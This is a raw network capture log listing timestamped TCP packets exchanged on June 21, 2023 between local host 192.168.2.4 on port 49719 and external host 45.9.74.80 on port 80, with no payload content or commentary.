                                                                                                  Jun 21, 2023 20:24:11.688652039 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.688679934 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.688719034 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.688733101 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.688757896 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.688796997 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.688863993 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.692899942 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.692996025 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.693036079 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.693069935 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.693079948 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.693099022 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.693125963 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.693169117 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.693188906 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.693212986 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.693254948 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.693267107 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.693298101 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.693342924 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.693386078 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.693402052 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.693453074 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.703499079 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.703552961 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.703600883 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.703644991 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.703675985 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.703691006 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.703732967 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.703737020 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.703779936 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.703793049 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.703830004 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.703879118 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.703926086 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.703929901 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.703973055 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.704001904 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.704019070 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.704238892 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.704648018 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.704695940 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.704741001 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.704768896 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.704787016 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.704832077 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.704874992 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.704879999 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.704921961 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.704948902 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.704967022 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.705010891 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.705055952 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.705100060 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.705111980 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.705132008 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.705143929 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.705190897 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.705235004 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.705275059 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.705280066 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.705295086 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.705326080 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.705370903 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.705389023 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.705431938 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.705478907 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.705499887 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.705523968 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.705570936 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.705578089 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.705620050 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.705665112 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.705674887 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.705712080 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.705758095 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.705774069 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.705804110 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.705849886 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.705895901 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.705935955 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.705941916 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.705962896 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.705987930 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.706032991 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.706049919 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.706079006 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.706125975 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.706140995 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.706171989 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.706218958 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.706233025 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.712447882 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.714024067 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.714073896 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.714083910 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.714119911 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.714168072 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.714211941 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.714215040 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.714261055 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.714302063 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.714306116 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.714349985 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.714361906 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.714412928 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.714459896 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.714505911 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.714519024 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.714550972 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.714577913 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.714598894 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.714644909 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.714665890 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.714693069 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.714741945 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.714745045 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.714804888 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.714849949 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.714860916 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.714896917 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.714941978 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.714987993 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.714997053 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.715034008 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.715081930 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.715089083 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.715127945 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.715131998 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.715174913 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.715219975 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.715229988 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.715266943 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.715312958 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.715320110 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.715363026 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.715408087 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.715452909 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.715461016 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.715498924 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.715545893 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.715553999 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.715593100 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.715595961 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.715639114 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.715686083 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.715707064 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.715730906 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.715776920 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.715784073 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.715821981 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.715868950 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.715874910 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.715915918 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.715961933 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.715965986 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.716007948 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.716053963 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.716098070 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.716144085 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.716173887 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.716675043 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.718599081 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.718647957 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.718692064 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.718708992 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.718736887 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.718750000 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.718782902 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.718827009 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.718839884 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.718871117 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.718915939 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.718925953 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.718962908 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.719008923 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.719029903 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.719054937 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.719100952 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.719125032 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.729310036 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.729356050 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.729396105 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.729432106 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.729439974 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.729484081 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.729497910 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.729526043 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.729569912 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.729583025 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.729614019 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.729655027 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.729667902 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.729696989 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.729738951 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.729748011 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.729784012 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.729804039 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.731462955 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.731509924 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.731555939 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.731559992 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.731606960 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.731652975 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.731657982 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.731700897 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.731746912 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.731756926 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.731794119 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.731800079 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.731839895 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.731888056 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.731895924 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.731935024 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.731981993 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.732021093 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.732027054 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.732074976 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.732078075 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.732120991 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.732170105 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.732217073 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.732219934 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.732279062 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.732296944 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.732327938 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.732388973 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.732391119 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.732436895 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.732480049 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.732501984 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.732527971 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.732575893 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.732603073 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.732620955 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.732667923 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.732675076 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.732713938 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.732759953 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.732767105 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.732806921 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.732853889 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.732868910 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.732899904 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.732948065 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.732965946 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.732992887 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.733041048 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.733062029 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.737802982 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.737852097 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.737895966 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.737945080 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.737987995 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.741389990 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.741440058 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.741487026 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.741532087 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.741533041 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.741581917 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.741640091 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.741733074 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.741780043 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.741827965 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.741835117 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.741874933 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.741928101 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.741938114 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.741986036 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.742033005 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.742038012 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.742079973 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.742125988 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.742136955 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.742175102 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.742176056 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.742222071 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.742266893 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.742274046 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.742315054 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.742361069 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.742368937 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.742408991 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.742455006 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.742502928 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.742502928 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.742548943 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.742597103 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.742603064 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.742644072 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.742690086 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.742697001 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.742742062 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.742754936 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.742803097 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.742851019 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.742858887 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.742897034 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.742944002 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.742948055 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.742990017 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.743036032 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.743081093 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.743084908 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.743127108 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.743172884 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.743181944 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.743221045 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.743226051 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.743266106 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.743311882 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.743318081 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.743357897 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.743390083 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.743422031 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.743468046 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.743472099 CEST4971980192.168.2.445.9.74.80
